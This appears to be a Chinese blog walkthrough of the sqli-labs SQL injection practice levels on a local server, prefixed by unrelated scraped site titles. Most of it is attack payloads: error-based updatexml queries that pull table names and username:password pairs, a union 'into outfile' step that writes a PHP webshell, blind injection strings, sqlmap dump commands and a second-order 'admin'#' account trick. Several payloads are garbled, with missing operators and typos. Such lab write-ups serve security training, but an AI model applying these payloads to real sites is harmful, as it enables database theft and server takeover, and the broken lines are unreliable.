常州公诚建设项目管理有限公司官方网站,特种作业证查询,wordpress 4.6漏洞,办网文章目录 总体思路#xff1a;less-1:less-2:less-3:less-4:less-5:less-6:less-7:less-8:布尔盲注less-9:时间盲注less-21:less-24: 总体思路#xff1a;
1、第一件事情 逃脱出单引号的控制 闭合单引号 2、单双引号需要成对出现 在python php Java中 3、2个办法 继续把多出… 文章目录 总体思路less-1:less-2:less-3:less-4:less-5:less-6:less-7:less-8:布尔盲注less-9:时间盲注less-21:less-24: 总体思路
1、第一件事情 逃脱出单引号的控制 闭合单引号 2、单双引号需要成对出现 在python php Java中 3、2个办法 继续把多出来的单引号闭合要么注释掉单引号 4、MySQL注释符 – # /***/ */ url会编码# 要用%23绕过 规则ord(‘#’) hex(35) 5、需要知道联合查询的列数 求当前表的列数联表查询必须保证两个表列数一致 6、需要order by 检测他的列数 列数3 7、让第一个表查询为空 8、最终目的 注入管理员账号密码 9、首先你要知道管理员表名 列名利用MySQL自带的数据库information_shame
less-1:
http://127.0.0.1/sqllabs/less-2/?id1
less-2:
http://127.0.0.1/sqllabs/less-2/?id1
less-3:
http://127.0.0.1/sqllabs/less-3/?id1
less-4:
http://127.0.0.1/sqllabs/less-4/?id1%27
less-5:
1、报错注入的突破口就是让页面上显示报错。 2、比如在本例中把查询参数的路径写错页面上只会显示查询不到内容但是不会报错。 3、但是如果把查询参数的格式符号写错页面上就会提示出报错信息 4、由于路径错误报错信息中显示出了路径信息。 5、于是我们想到如果在报错之前执行一下select语句然后在报错提醒信息那里回显出我们想要的数据信息就好了这//就是报错注入。
http://127.0.0.1/sqllabs/less-5/?id1%27%20and%20updatexml(1,concat(0x7e,substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema%27security%27%20limit%203,1),1,32),0x7e),1)--%20 //查到表名
http://127.0.0.1/sqllabs/less-5/?id1%27%20and%20updatexml(1,concat(0x7e,substr((select%20column_name%20from%20information_schema.columns%20where%20table_schema%27security%27%20and%20table_name%20%20%27users%27%20limit%202,1),1,32),0x7e),1)--%20//查到列名
127.0.0.1/sqllabs/less-5/?id1%27 and updatexml(1,concat(0x7e,substr((select group_concat(username,0x3a,password)from users),1,32),0x7e),1)--less-6:
sqlmapless-7:
mysql注入webshell必须满足 1、root权限 2、知道网站物理路径 3、secure_file_priv 为空show variables like ‘%secure%’;
id1%27))union select 1,2,?php phpinfo(); into outfile E:/phpstudy_pro/www/sqllabs/webshell.php;--less-8:布尔盲注
http://127.0.0.1/sqllabs/less-8/?id1%27%20and%20ascii(substr((select%20database()),1,1))115--我用sqlmap解出来的
python sqlmap/sqlmap.py-u http://127.0.0.1/sqllabs/Less-8/?id1 -dbs //提取数据库
python sqlmap/sqlmap py-u http://127.0.0.1/sqllabs/ess-8/?id1 -D security --tables//表名
python sqlmap/sqlmap.py -u http://127.0.0.1/sqllabs/Less-8/?id1 -D security -T users --columns //列名
python sqlmap/sqlmap.pyu http://127.0.0.1/sqllabs/Less-8/?id1 -D security -T users --dump -C username,password//用户名和密码less-9:时间盲注
1 and if(ascii(substr(database(), %d, 1)) %d, sleep(1), 0)--less-10: sqlmap
less-21:
我发现不输入正确的用户名和密码就拿不到cookie由于我知道数据库所以我尝试输入正确的用户名和密码就抓包把post放了之后看到get包里的cookie由于代码是对用户名先进行base64编码之后再进行解码所以我在注入的时候先对我的uname进行sql代码的base64编码注入即可
截图如下
less-24:
看源代码可知在用户修改密码时又注入sql可能我先注册一个admin’#用户单引号用于合并#用来注释后面的代码包括’然后登录admin’#用户修改密码再进入数据库中可以看到admin用户的密码被修改了